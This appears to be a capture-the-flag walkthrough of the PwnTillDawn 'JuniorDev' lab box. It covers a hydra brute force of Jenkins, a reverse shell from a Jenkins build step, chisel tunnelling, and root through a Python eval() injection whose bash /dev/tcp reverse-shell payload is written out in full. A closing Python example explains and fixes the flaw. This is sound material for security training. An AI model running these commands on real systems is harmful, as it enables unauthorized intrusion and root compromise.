JuniorDev (10.150.150.38)

This is a vulnerable VM from PwnTillDawn.

Box: Medium, Flags to acquire = 4

Enumeration

Let's start with a quick Nmap scan.

We can see 2 ports open: SSH and an unknown port. Let's enumerate a bit more.

Port 30609 looks to be a web service, given the robots.txt entry, so let's check it out.

http://10.150.150.38:30609/robots.txt

We get a hint here about "build" links, whatever that means. Let's visit the main web service. Here we are presented with a Jenkins login portal.

After trying numerous public exploits and using Metasploit for Jenkins, none of the payloads would work, so back to the drawing board (brute-force time!).

hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.150.150.38 -s 30609 http-post-form "/j_acegi_security_check:j_username=^USER^&j_password=^PASS^&from=%2F&Submit=Sign+in:F=loginError"

After a little while, we get a result.

Now we can log in!

FLAG69

Looking over the Jenkins application and visiting the asynchPeople page, we get our first flag (http://10.150.150.38:30609/asynchPeople/).

Foothold

Remembering our hint from earlier for build (robots.txt), it becomes apparent we need to use the build options to get onto the box.

Time to make a new task. Head over to http://10.150.150.38:30609/view/all/newJob (new Item)

Enter a project name, select Freestyle project as the type, then click OK.

On the next page enter a description in the description box (whatever you like here), then scroll down to Build (there's that hint again!).

Click Add build step and choose Execute shell (we are on a Linux box).

Then add your payload. I used a simple bash reverse shell here.

Click Save, then Build Now to fire the payload (don’t forget to start a Netcat listener!)

Boom!! We get our shell

Let's make the shell stable so Ctrl + c won't kick us off the box; we can use python3 for this.

Shell Upgrade (STTY)

* python3 -c 'import pty;pty.spawn("/bin/bash")'
* Press Ctrl + z
* Enter: stty raw -echo;fg
* Enter: reset
* Enter: xterm
* Enter: export TERM=xterm

Tip: exporting TERM makes the terminal support things like Ctrl + l.

FLAG70

Now we can grab FLAG70 at /var/lib/jenkins

Enum Round 2

With the first two flags, it's time to start the enum phase again.

Checking out the system shows an open port on localhost:8080

netstat -lnptu

Using wget we can see the page and source code. Let's do that.

wget 127.0.0.1:8080

Here we can see the source code by running cat on index.html; a comment in the source points to another FLAG (this time in an image). We can download the image with wget and send it to our machine to view it, or we can use chisel (a port forward/tunnel tool) to reach the internal site directly from our machine.

Chisel (port forward)

We need to get chisel on the box we are attacking.

Chisel Download: https://github.com/jpillora/chisel

Basic user guide for tunneling: https://book.hacktricks.xyz/tunneling-and-port-forwarding

I used my own tool to transfer the files

SimpServ

I’ve added the binary in /usr/local/bin/simpserv. I have my most used tools and scripts saved in /opt/tools. This allows me to enter one command to transfer files across to the box.

cd /opt/tools && sudo simpserv

Now I can transfer with copy and paste for ease (you're welcome to use whatever method you feel comfortable with).

Upload chisel to the target box (the machine we are attacking), then start it up for a reverse tunnel back to your machine.

Your machine:
chisel server -p 8000 --reverse

Target box (the machine we are attacking):
chisel client YOURIP:8000 R:8080:127.0.0.1:8080

If you have Burp Suite running, it is already listening on 8080, so change the first port in the R: argument (the local port opened on your machine) to something else.

Target box (the machine we are attacking):
eg: chisel client YOURIP:8000 R:8081:127.0.0.1:8080

Now you can open your browser and connect to the internal site via the reverse proxy.

FLAG71

Now with the proxy setup, we can finally access FLAG.png (flag71)

Privilege Escalation (Root)

Looking at the webpage on localhost port 8080, we can see 2 boxes which take in 2 numbers and add them together.

Having no luck with basic web attacks, I started to enum the box again. I discovered a file owned by root running in the processes. (/usr/bin/python /root/mycalc/untitled.py 127.0.0.1 8080)

This gives us a hint to the exploit path (Python command injection). Not knowing this, a quick Google search led me to this article: https://medium.com/swlh/hacking-python-applications-5d4cd541b3f1

Trying a few of the commands, I quickly gained a reverse shell.

Start another Netcat listener; I chose port 30609 as it's open already.

Listener (your machine):
nc -lnvp 30609

Box 1 on the website:
__import__('os').system('bash -c "bash -i >& /dev/tcp/10.66.66.238/30609 0>&1"')#

Hit Calculate to get the reverse shell.

Now we can get the final flag as Root! (FLAG72)
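To show why the calculator was exploitable and how the hole is closed, here is an added example; it is not the box's /root/mycalc/untitled.py (whose source we never saw) and assumes the script glues the two form fields into one expression and hands it to eval(), which is the shape the payload above relies on (the trailing # comments out whatever the script appends after Box 1).

```python
import re

# Hardened parser accepts only a plain number: optional sign, digits, optional fraction.
_NUMBER = re.compile(r"[+-]?\d+(\.\d+)?")


def add_unsafe(a: str, b: str):
    """Vulnerable pattern (assumed, not the box's real source): the two fields are
    concatenated into an expression and evaluated. Anything Python can evaluate,
    including __import__(), runs with the privileges of the process (root here)."""
    return eval(a + "+" + b)


def add_safe(a: str, b: str) -> float:
    """Fixed version: both fields must be literal numbers before they are used,
    so no expression or function call ever reaches the interpreter."""
    for field in (a, b):
        if not _NUMBER.fullmatch(field.strip()):
            raise ValueError(f"not a number: {field!r}")
    return float(a) + float(b)


def is_rejected(a: str, b: str) -> bool:
    """True when the hardened calculator refuses the input."""
    try:
        add_safe(a, b)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    # Constructed inputs: a normal sum, an expression, and a benign probe that
    # uses the same '#' trick as the payload to swallow the second operand.
    print(add_unsafe("2", "3"))               # 5
    print(add_unsafe("1*2", "3"))             # 5, the field was evaluated, not parsed
    print(add_unsafe("len('abc') #", "3"))    # 3, '+3' was commented out
    print(add_safe("2", "3"))                 # 5.0
    print(is_rejected("len('abc') #", "3"))   # True, the call never runs
```

In the real app the same eval() call was reachable from the web form, so the fix is input validation at the field level, plus not running the service as root.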

Thanks!! I hope you enjoyed the walkthrough.

Keep hacking the world! (Ethically!!)

Credits:

https://online.pwntilldawn.com/

https://www.wizlynxgroup.com/
